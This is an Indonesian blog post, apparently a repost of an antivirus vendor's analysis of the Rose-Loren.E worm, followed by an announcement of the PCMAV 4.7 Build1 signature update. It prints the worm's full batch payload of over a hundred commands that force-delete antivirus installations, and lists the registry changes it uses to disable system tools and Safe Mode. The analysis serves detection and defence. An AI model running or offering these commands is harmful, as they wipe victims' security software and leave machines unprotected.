Jangan Komentar...!!! Tapi Baca Dulu Baru Komentar Thank's Jika Mo Kasih Saran & Kritikan

Build1

PCMAV 4.7 Ragnarok 3 + Build1


Rose-Loren.E

Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.



A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm

B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.

C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah: 
  1. del /f /q /s  C:\ESET\*.* >nul
  2. del /f /q /s  C:\antivi~1\*.* >nul
  3. del /f /q /s  C:\antivi~2\*.* >nul
  4. del /f /q /s  C:\antiviru\*.* >nul
  5. del /f /q /s  C:\avg\*.* >nul
  6. del /f /q /s  C:\kasper~1\*.* >nul
  7. del /f /q /s  C:\kasper~2\*.* >nul
  8. del /f /q /s  C:\mcafee\*.* >nul
  9. del /f /q /s  C:\mcafee.com\agent\*.* >nul
  10. del /f /q /s  C:\mcafee.com\*.* >nul
  11. del /f /q /s  C:\mcafee.com\VSO\*.* >nul
  12. del /f /q /s  C:\mcafee~1\*.* >nul
  13. del /f /q /s  C:\msav\*.* >nul
  14. del /f /q /s  C:\norman\*.* >nul
  15. del /f /q /s  C:\norton~1\*.* >nul
  16. del /f /q /s  C:\norton~2\*.* >nul
  17. del /f /q /s  C:\pav\*.* >nul
  18. del /f /q /s  C:\pccill~1\*.* >nul
  19. del /f /q /s  C:\iolo\*.* >nul
  20. del /f /q /s  C:\progra~1\ESET\*.* >nul
  21. del /f /q /s  C:\progra~1\antivi~1\*.* >nul
  22. del /f /q /s  C:\progra~1\antivi~2\*.* >nul
  23. del /f /q /s  C:\progra~1\avg\*.* >nul
  24. del /f /q /s  C:\progra~1\kasper~1\*.* >nul
  25. del /f /q /s  C:\progra~1\kasper~2\*.* >nul
  26. del /f /q /s  C:\progra~1\mcafee\*.* >nul
  27. del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
  28. del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
  29. del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
  30. del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
  31. del /f /q /s  C:\progra~1\mindso~1\*.* >nul
  32. del /f /q /s  C:\progra~1\norman\*.* >nul
  33. del /f /q /s  C:\progra~1\norton~1\*.* >nul
  34. del /f /q /s  C:\progra~1\norton~2\*.* >nul
  35. del /f /q /s  C:\progra~1\pandas~1\*.* >nul
  36. del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
  37. del /f /q /s  C:\progra~1\iolo\*.* >nul
  38. del /f /q /s /a:h  C:\ESET\*.* >nul
  39. del /f /q /s /a:h  C:\antivi~1\*.* >nul
  40. del /f /q /s /a:h  C:\antivi~2\*.* >nul
  41. del /f /q /s /a:h  C:\antiviru\*.* >nul
  42. del /f /q /s /a:h  C:\avg\*.* >nul
  43. del /f /q /s /a:h  C:\kasper~1\*.* >nul
  44. del /f /q /s /a:h  C:\kasper~2\*.* >nul
  45. del /f /q /s /a:h  C:\mcafee\*.* >nul
  46. del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
  47. del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
  48. del /f /q /s /a:h  C:\mcafee~1\*.* >nul
  49. del /f /q /s /a:h  C:\msav\*.* >nul
  50. del /f /q /s /a:h  C:\norman\*.* >nul
  51. del /f /q /s /a:h  C:\norton~1\*.* >nul
  52. del /f /q /s /a:h  C:\norton~2\*.* >nul
  53. del /f /q /s /a:h  C:\pav\*.* >nul
  54. del /f /q /s /a:h  C:\pccill~1\*.* >nul
  55. del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
  56. del /f /q /s /a:h  C:\iolo\*.* >nul
  57. del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
  58. del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
  59. del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
  60. del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
  61. del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
  62. del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
  63. del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
  64. del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
  65. del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
  66. del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
  67. del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
  68. del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
  69. del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
  70. del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
  71. del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
  72. del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
  73. del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
  74. del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
  75. del /f /q /s /a:R  C:\ESET\*.* >nul
  76. del /f /q /s /a:R  C:\antivi~1\*.* >nul
  77. del /f /q /s /a:R  C:\antivi~2\*.* >nul
  78. del /f /q /s /a:R  C:\antiviru\*.* >nul
  79. del /f /q /s /a:R  C:\avg\*.* >nul
  80. del /f /q /s /a:R  C:\kasper~1\*.* >nul
  81. del /f /q /s /a:R  C:\kasper~2\*.* >nul
  82. del /f /q /s /a:R  C:\mcafee\*.* >nul
  83. del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
  84. del /f /q /s /a:R  C:\mcafee.com\*.* >nul
  85. del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
  86. del /f /q /s /a:R  C:\mcafee~1\*.* >nul
  87. del /f /q /s /a:R  C:\msav\*.* >nul
  88. del /f /q /s /a:R  C:\norman\*.* >nul
  89. del /f /q /s /a:R  C:\norton~1\*.* >nul
  90. del /f /q /s /a:R  C:\norton~2\*.* >nul
  91. del /f /q /s /a:R  C:\pav\*.* >nul
  92. del /f /q /s /a:R  C:\pccill~1\*.* >nul
  93. del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
  94. del /f /q /s /a:R  C:\iolo\*.* >nul
  95. del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
  96. del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
  97. del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
  98. del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
  99. del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
  100. del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
  101. del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
  102. del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
  103. del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
  104. del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
  105. del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
  106. del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
  107. del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
  108. del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
  109. del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
  110. del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
  111. del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
  112. del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul

  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.

    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya. 

Rose-Loren.E - HTML Rose-Loren.E - View Source





  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.

    Rose-Loren.E - Flash Disk

    Rose-Loren.E - Autorun











    • D. Hasil Infeksi Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:

    Rose-Loren.E - Logon
    Text yang dirandom adalah:
    1. Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
    2. Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
    3. Mahkota kemanusiaan ialah rendah hati
    4. Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
    5. Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
    6. Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
    7. Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
    8. Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
    9. Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
    10. Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
    11. Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
    12. Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
    13. Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
    14. Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
    15. Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
    16. Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
    17. Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
    18. Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
    19. Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
    20. Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
    21. Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
    22. Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
    23. Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
    24. Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
    25. Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
    26. Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
    27. Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
    28. Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
    29. Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
    30. Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
    31. Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
    32. Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
    33. Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
    34. Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
    35. Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
    36. Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong

    Worm juga menghilangkan beberapa menu pada Folder Options.

    Rose-Loren.E - Folder Options

    Payload lainnya adalah merubah tampilan properties pada My Computers.

    Rose-Loren.E - System

    Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.
    • Regedit.exe
    • Msconfig.exe
    • taskmgr.exe
    • ntvdm.exe
    • rstrui.exe
    • EnableExtensions
    • FolderContentsInfoTip
    • NoRun
    • NoFind
    • DisableCurrentUserRun
    • HideFileExt
    • FolderSizeTip
    • ShowFullPathAddress
    • ShowFullPath
    • Disable SafeMode
    • Disable Show Hidden and Super Hidden files.
    Worm juga akan membuat startup dengan nama WinUp dan RsWin.

    E. Pembersihan
    Mulai PCMAV 4.7 Update Build1, Rose-Loren.E beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.

    Rose-Loren.E - Detected

    PCMAV 4.7 Update Build1
    Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build1 telah hadir dengan penambahan 72 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

    Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

    Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link dibwah ini i:

    Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

    Daftar tambahan virus hingga PCMAV 4.7 Update Build1:
    AlamarPica.vbs
    AnitaLoroaji
    AnitaLoroaji.inf
    Autoit-Cyrillic
    Autoit-ReplaceIcon.D
    Autoit-ReplaceIcon.E
    Autoit-ReplaceIcon.F
    Autoit.FD
    Autoit.FD.ini
    Autoit.FE
    Autoit.FE.serv
    Cobax.exe.C
    Dhoos
    Dhoos.dll
    Dhoos.url.A
    Dhoos.url.B
    Dhoos.url.C
    FakeAV
    FakeAV-Downloader.K
    FakeAV-Downloader.K.dat
    FakeAV-Downloader.K.dll.A
    FakeAV-Downloader.K.dll.B
    FakeAV-Downloader.K.dll.C
    FakeAV-Downloader.K.job
    FakeAV-Downloader.K.lnk.A
    FakeAV-Downloader.K.lnk.B
    FakeAV-Downloader.K.lnk.C
    FakeAV-Downloader.K.lnk.D
    FakeAV-Downloader.K.ref
    FakeAV-Downloader.K.rtf
    FakeAV-Downloader.K.setup
    FakeAV-Downloader.K.unins
    FakeAV-Downloader.K.url
    Fakhricker.vbs
    Gabest.B
    GavGent-HVM31
    GXRG-Snow.vbs
    GXRG-Snow.vbs.host
    GXRG-Snow.vbs.inf
    GXRG.vbs
    GXRG.vbs.inf
    H323
    H323.bat
    KefiUnique.vbs
    KefiUnique.vbs.txt
    KefiUnique.vbs.upd
    Lz32.vbs.B
    Lz32.vbs.C
    Ossep.vbs
    Ossep.vbs.inf
    Ramnit.A.Variant
    Ramnit.B.Variant
    Ramnit.C.Variant
    Ramnit.D.Variant
    Ramnit.E.Variant
    Ronkor.C
    Ronkor.C.htt
    Ronkor.C.txt
    Rose-Loren.E
    TripleExe
    TripleExe.inf
    VB-Shortcut-1.lnk
    XSample.vbs
    XSample.vbs.inf
    XSample.vbs.ini
    XSample.vbs.lnk.A
    XSample.vbs.lnk.B
    XSample.vbs.lnk.C
    XSample.vbs.lnk.D
    XSample.vbs.lnk.E
    XSample.vbs.lnk.F
    XSample.vbs.mp3

    PCMAV 4.7 Update Build1 telah tersedia dengan penambahan 72 database virus baru yang telah berhasil ditambahkan pada update build kali ini. Update PCMAV dapat dilakukan secara otomatis dengan memilih “Update” pada menu klik kanan icon PCMAV di system tray, ini salah satu fitur yang telah berhasil ditambahkan pada rilis PCMAV 4.7 Jika Anda ingin mendownload update build secara manual dapat melalui link dibawah ini.



    (Keterangan Lengkap Lihat Gambar Di Bawah) .........




    >>> Selamat Mencoba <<<

    Note (Penting) :
    1. Setelah  Download PCMAV 4.7 Ragnarok 3 extraks terlebih dahulu kemudian copy/cut seluruh Isi Yang Terdapat Dalam Folder ekstrakan tersebut kedalam folder PCMAV sebelumnya (PCMAV 4.6 Ragnarok 3), jika belum memiliki PCMAV 4.6 Ragnarok 3 silahkan Download disini PCMAV 4.6
    2. no.2 (Hanya update (.vdb) Build1) di Extract dahulu setelah itu dimasukan dalam folder PCMAV 4.6 Ragnarok 3/vdb


    Download Here

    1. Hanya PCMAV 4.7 Ragnarok 3 :
    Link 1 = PCMAV 4.7
    Link 2 = PCMAV 4.7

    2. Hanya update (.vdb) Build1 :
    Link 1 = Update Build 1
    Link 2 =     Update Build 1
    Posted by
    Labels: , ,

    Tidak ada komentar:

    Posting Komentar

    Langganan: Posting Komentar (Atom)